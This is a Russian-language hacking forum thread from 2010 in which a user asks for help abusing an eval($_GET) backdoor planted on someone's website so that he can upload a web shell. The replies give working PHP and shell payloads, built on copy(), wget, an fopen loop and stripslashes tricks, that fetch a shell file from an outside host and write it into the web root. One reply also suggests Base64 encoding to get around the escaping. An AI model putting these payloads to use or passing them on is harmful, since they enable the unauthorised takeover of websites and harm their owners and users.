HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
Перезагрузить страницу Помогите воспользоваться уязвимостью
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 23.09.2010, 21:49
LamerHacker
Guest
Сообщений: n/a
Провел на форуме:
1931

Репутация: 0
По умолчанию
Есть одна уязвимость, точнее Бэкдор в одном скрипте

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]eval ([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'q'[/COLOR][COLOR="#007700"]]);[/COLOR][/COLOR
Хочу залить на сайт шелл, проблема в том, что кавычки в параметрах $_GET экранизируется, поэтому ничего не выходит
 
Ответить с цитированием

  #2  
Старый 23.09.2010, 22:14
LamerHacker
Guest
Сообщений: n/a
Провел на форуме:
1931

Репутация: 0
По умолчанию
Пока ждал ответа мысль сама пришла в голову

Если кому интересно, то вот мой вариант

index.php?q=$_GET[q2]=stripslashes($_GET[q2]);eval($_GET[q2]);&q2=copy("http://site.ru/shell.txt","shell.php");
 
Ответить с цитированием

  #3  
Старый 24.09.2010, 08:23
Redwood
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
Провел на форуме:
2212846

Репутация: 56
По умолчанию
Код:
Code:
или

Код:
Code:
Код:
Code:
cmd=copy('http://site.ru/shell.txt','/var/www/shell.php');
Без stripslashes

Код:
Code:
Код:
Code:
cmd=copy($_REQUEST[a],$_REQUEST[b]);&a=http://site.ru/shell.txt&b=/var/www/shell.php
Через wget, curl, fetch и другие качалки

Код:
Code:
Код:
Code:
cmd=wget http://site.ru/shell.txt -O /var/www/shell.php
Ну, а если, все таки, очень хочется по извращаться

Код:
Code:
eval($_REQUEST[cmd]);
Код:
Code:
cmd=$a=fopen($_REQUEST[b],$_REQUEST[bb]);$b=fopen($_REQUEST[c],$_REQUEST[cc]);while(!feof($a)){$res=fgets($a);fputs($b,$res);}&bb=b&cc=w+&b=http://site.ru/shell.txt&c=/var/www/shell.php
 
Ответить с цитированием

  #4  
Старый 24.09.2010, 10:16
kfor
Участник форума
Регистрация: 01.09.2005
Сообщений: 194
Провел на форуме:
818095

Репутация: 34
Отправить сообщение для kfor с помощью ICQ
По умолчанию
Я бы ваапще использовал Base64.
 
Ответить с цитированием

  #5  
Старый 24.09.2010, 14:34
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию
Redwood, видимо, он править не имеет возможности скрипт, поэтому юзать только может eval ($_GET['q']); (то, что какой-то хацкер прописал до него)
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ